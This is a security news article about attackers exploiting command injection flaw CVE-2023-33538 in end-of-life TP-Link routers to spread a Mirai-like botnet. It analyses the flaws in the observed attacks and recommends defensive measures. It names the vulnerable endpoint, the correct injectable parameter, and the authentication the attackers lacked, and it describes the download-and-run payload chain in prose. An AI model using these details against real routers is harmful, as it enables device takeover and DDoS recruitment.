Hackers are currently engaged in extensive scans for vulnerable TP-Link home routers, aiming to deploy malware reminiscent of the infamous Mirai botnet by exploiting a specific vulnerability, designated CVE-2023-33538. This latest surge of automated attacks raises significant concerns within the cybersecurity community, particularly as it involves the manipulation of end-of-life devices.
Though researchers have noted that the ongoing exploit attempts display technical flaws, they caution that the underlying vulnerability is both legitimate and perilously potent, particularly when it is paired with default access credentials and firmware that is no longer supported. The affected models—including TL-WR940N versions 2 and 4, TL-WR740N versions 1 and 2, and TL-WR841N versions 8 and 10—are all classified as end-of-life, meaning they do not receive any further security updates.
The vulnerability can be traced back to the router’s web management interface, specifically at the /userRpm/WlanNetworkRpm.htm endpoint. Here, the device processes parameters linked to Wi-Fi configuration, presenting a route for potential exploitation. As researchers have detailed, CVE-2023-33538 is characterized as a command injection vulnerability. This flaw allows specially crafted input in the SSID field to be executed directly as a shell command without any prior sanitization, granting attackers the capability to run arbitrary system commands on the compromised device.
Public documentation, alongside archived proof-of-concept exploits, has outlined how this particular parameter can be manipulated to execute high-level system commands on the affected firmware. Following the addition of CVE-2023-33538 to the CISA (Cybersecurity and Infrastructure Security Agency) catalogue of Known Exploited Vulnerabilities in June 2025, researchers noted a significant uptick in automated HTTP GET requests aimed at the vulnerable endpoint.
Malicious actors have been observed attempting to inject command chains specifically through the SSID field to download an ELF binary referred to as ‘arm7’ from a designated IP address. This binary is crucial to the attack, as static and dynamic analyses have identified it as a Mirai-like payload, with numerous references to the “condi” family, which has previously been documented in various IoT botnets.
Upon successful execution, the ‘arm7’ binary connects to a command-and-control server to process customizable command sequences. It also possesses the ability to update itself across different CPU architectures, effectively converting infected routers into distributed denial-of-service (DDoS) bots. While the scanning activity appears relentless, researchers have confirmed that the observed exploits are riddled with critical implementation errors.
One significant issue arises from targeting the wrong SSID parameter, as the actual vulnerable input is the ssid1 field. Due to this misconfiguration, injected commands fail to reach the execution pathway that would initiate a shell command. Furthermore, effective exploitation demands an authenticated session with the router’s web interface. Yet, in the observed traffic, attackers are only using basic admin:admin credentials, neglecting to establish a legitimate session token as required by the firmware’s login protocol.
Finally, many of the malicious exploit chains depend on tools such as wget for downloading malware. However, the tested TP-Link firmware comes with a limited BusyBox environment that does not include common download utilities, thereby restricting these particular payloads. Despite these shortcomings in the exploit attempts, researchers have verified through firmware emulation and reverse engineering that the vulnerability itself remains exploitable, particularly when an attacker possesses valid credentials and crafts the request with precision.
The execFormatCmd() function is crucial in this scenario as it invokes the tp_SystemEx() function to execute commands formatted with the injected content, like “iwconfig %s essid %s”. As such, default or weak passwords on internet-exposed routers continue to pose a critical threat, transforming this authenticated vulnerability into an easily exploitable pathway for botnet infection.
Recognizing the severity of the situation, TP-Link has announced that the affected models are beyond their lifecycle and will not receive additional patches. They have advised users to consider replacing these outdated devices with models that are still supported while also recommending that individuals avoid utilizing default credentials.
The situation has prompted cybersecurity experts and organizations to advocate for additional hardening measures. These include disabling remote management features, segmenting IoT devices from sensitive networks, and enforcing strong, unique passwords for admin access. For organizations employing enterprise security platforms, it is crucial to detect or block related activities through layers such as URL/DNS filtering, intrusion prevention, and advanced malware analysis. This defense strategy should particularly flag any traffic directed towards known Mirai-related infrastructures.
In an era characterized by increasing attacks on IoT routers, incident response teams strongly recommend swiftly replacing vulnerable TP-Link units. Moreover, any unusual outbound connections or repeated login attempts from these devices should be investigated immediately to preempt potential cyber threats.